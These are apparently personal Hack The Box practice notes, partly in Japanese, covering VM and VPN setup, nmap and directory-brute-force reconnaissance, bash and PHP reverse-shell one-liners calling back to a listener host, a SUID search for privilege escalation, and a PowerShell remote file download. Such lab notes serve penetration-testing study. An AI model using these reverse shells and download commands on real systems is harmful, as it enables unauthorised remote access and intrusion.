Notes about Hack The Box
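# Install the VirtualBox Guest Additions from the virtual CD-ROM.
# Assumes the Guest Additions image is already attached to the VM and that
# the mount point /media/cdrom1 exists -- TODO confirm on a fresh install.
sudo mount /dev/cdrom /media/cdrom1
# The image is mounted under /media, so the installer lives in
# /media/cdrom1 (a top-level /cdrom1 directory is never created here).
cd /media/cdrom1
# The installer runs as root: check that the mounted image is the one
# attached through VirtualBox before executing it.
sudo ./VBoxLinuxAdditions.run
# Restart the VM once the installer has finished.
reboot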
- Download ovpn file for VIP account
sudo openvpn --config ./Desktop/yufujioka.ovpn
- バージョン検出
nmap -sV rhost
- OS検出
nmap -O rhost
- OS 検出 + バージョン検出 (-A はスクリプトスキャンと traceroute も有効にする)
nmap -A rhost
- ping を送らない (ホスト発見をスキップし、対象を稼働中として扱う)
nmap -Pn rhost
- Vulnerability 検出 (vuln カテゴリの NSE スクリプトを実行。結果には誤検知が含まれ得るので手動で確認する)
nmap --script=vuln -p rport1,rport2 rhost
- DNS
- dirb url -w
- Gobuster options
- Gobuster Cheatsheet
- quick play
gobuster dir -t 100 -u targetUrl -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o outfile
- ffuf
- quick play
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u targetUrl/FUZZ
- receive
nc -lnvp 1234
- bash
exec 5<>/dev/tcp/my_ip/my_port
/bin/bash -i >& /dev/tcp/my_ip/my_port 0>&1
/bin/bash -c "bash -i >& /dev/tcp/my_ip/my_port 0>&1"
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");
- Direct input
php -r '$sock=fsockopen("your.server.ip.address",1234);exec("/bin/bash -i <&3 >&3 2>&3");'
- PHP fsockopen
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
- Direct input
php -r '$s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");'
- When I get "must be run from a terminal"
python3 -c "import pty; pty.spawn('/bin/bash')"
# List regular files (-type f) with the setuid bit set (-perm -u=s),
# searching the whole filesystem from /. Error output such as
# "Permission denied" is discarded via 2>/dev/null.
find / -perm -u=s -type f 2>/dev/null
- whoami
$env:UserName
- 論理ドライブの一覧を表示
Get-PSDrive
- カレントドライブの移動
Set-Location C:
- Download file
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.22:8000/file','filename')"